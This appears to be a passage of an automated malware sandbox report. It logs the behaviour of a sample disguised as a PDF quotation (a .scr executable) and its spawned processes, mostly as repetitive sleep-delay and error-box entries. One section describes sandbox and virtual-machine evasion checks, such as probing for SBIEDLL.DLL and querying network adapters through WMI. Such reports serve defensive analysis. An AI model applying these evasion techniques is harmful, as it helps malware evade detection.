                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002CE7000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.0000000002771000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe TID: 6844Thread sleep count: 43 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe TID: 6844Thread sleep time: -43000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe TID: 6860Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep count: 33 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1096Thread sleep count: 7594 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -599884s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1096Thread sleep count: 2001 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -599652s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -599537s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -599399s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -599283s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -599167s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -599049s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -598920s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -598797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -598681s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -598560s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -598455s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -598339s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -598224s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -598092s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -597976s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -597854s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -597738s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -597606s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -597490s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -597352s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -597236s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -597121s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -597004s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -596873s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -596751s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -596635s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -596519s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -596388s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -596285s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -596156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -596046s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -595937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -595828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -595718s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -595609s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -595499s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -595390s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -595276s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -595156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -595046s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -594936s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -594828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -594718s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -594608s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -594499s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -594390s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -594280s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 1436Thread sleep time: -594171s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exe TID: 4804Thread sleep count: 44 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exe TID: 4804Thread sleep time: -44000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exe TID: 4472Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 4996Thread sleep count: 70 > 30Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,33_2_0040D8FB
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599884Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599652Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599537Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599399Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599283Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599167Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599049Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598920Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598681Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598560Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598455Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598339Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598224Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598092Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597976Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597854Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597738Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597606Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597490Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597352Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597236Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597121Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 597004Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596873Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596751Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596635Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596519Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596388Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596285Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 595499Jump to behavior
